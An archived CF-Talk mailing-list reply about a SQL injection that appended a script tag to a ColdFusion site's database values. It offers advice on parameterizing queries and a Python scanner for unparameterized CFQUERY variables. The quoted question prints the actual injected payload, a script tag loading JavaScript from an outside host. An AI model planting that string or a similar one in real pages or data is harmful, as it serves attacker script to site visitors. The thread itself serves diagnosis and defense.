> > So I'm hearing that it should be fine??  
> > 
> > Somehow their database column values had the following string appended:
> > "></title><InvalidTag src="http://1.verynx.cn/w.js";></script><!--"
> > 
> > So for example the column "firstname" value "John" became:
> > "John"></title><InvalidTag src="http://1.verynx.cn/w.js";></script><!--
> > 
> > What else could have caused this?  Like you said the parameters are in 
> > single quotes and the data type is varchar so it must have a single 
> > quote in order to work.  I'm confused...
> 
> The specific attack in question looks for numeric inputs, not 
> character inputs. So, my guess is that you have some other 
> unparameterized query that is being called by the attack.
> 
> I recommend you examine your codebase to find unparameterized 
> queries. I found this tool, mentioned here by others, to be 
> very helpful for this:
> http://qpscanner.riaforge.org/

As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
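Mark's point is that a `#variable#` dropped straight into a CFQUERY body is unparameterized whether or not it sits inside single quotes, and the unquoted numeric form is the one this attack targets. The scanner below, an added example in the spirit of the qpscanner tool (not code from the thread or from qpscanner), flags every interpolated variable that is not wrapped in `<cfqueryparam>`; the CFML sample, query names and variable names are constructed for the demonstration.

```python
import re

# Constructed CFML sample (not from the thread): q1 interpolates a numeric
# value unquoted, q2 a string inside single quotes, q3 uses cfqueryparam.
SAMPLE_CFM = """
<cfquery name="q1" datasource="ds">
  SELECT firstname FROM users WHERE id = #url.id#
</cfquery>
<cfquery name="q2" datasource="ds">
  SELECT id FROM users WHERE firstname = '#form.firstname#'
</cfquery>
<cfquery name="q3" datasource="ds">
  SELECT firstname FROM users
  WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>
"""

QUERY_RE = re.compile(r"<cfquery\b([^>]*)>(.*?)</cfquery>", re.IGNORECASE | re.DOTALL)
PARAM_RE = re.compile(r"<cfqueryparam\b[^>]*>", re.IGNORECASE)
NAME_RE = re.compile(r'\bname\s*=\s*"([^"]*)"', re.IGNORECASE)
VAR_RE = re.compile(r"#([^#\s]+)#")


def find_unparameterized(cfml):
    """Return one finding per #variable# interpolated directly into a
    <cfquery> body, i.e. not wrapped in <cfqueryparam>.

    This is a regex pass, not a CFML parser: it will not understand
    variables built up outside the tag or hidden in SQL comments, so treat
    a clean result as a starting point for review rather than proof."""
    findings = []
    for attrs, body in QUERY_RE.findall(cfml):
        name_match = NAME_RE.search(attrs)
        qname = name_match.group(1) if name_match else "<unnamed>"
        # Drop cfqueryparam tags first so the #var# inside them is not counted.
        stripped = PARAM_RE.sub("", body)
        for v in VAR_RE.finditer(stripped):
            # Unquoted interpolation is the numeric case the thread describes;
            # a quoted one is still unparameterized and still needs fixing.
            quoted = v.start() > 0 and stripped[v.start() - 1] == "'"
            findings.append({"query": qname, "var": v.group(1), "quoted": quoted})
    return findings


if __name__ == "__main__":
    for f in find_unparameterized(SAMPLE_CFM):
        kind = "quoted string" if f["quoted"] else "unquoted (numeric-style)"
        print(f"{f['query']}: #{f['var']}# interpolated as {kind}; wrap in cfqueryparam")
```

Point it at real `.cfm`/`.cfc` files by reading them into `find_unparameterized`; q3 shows the shape every flagged query should end up in.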



Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309501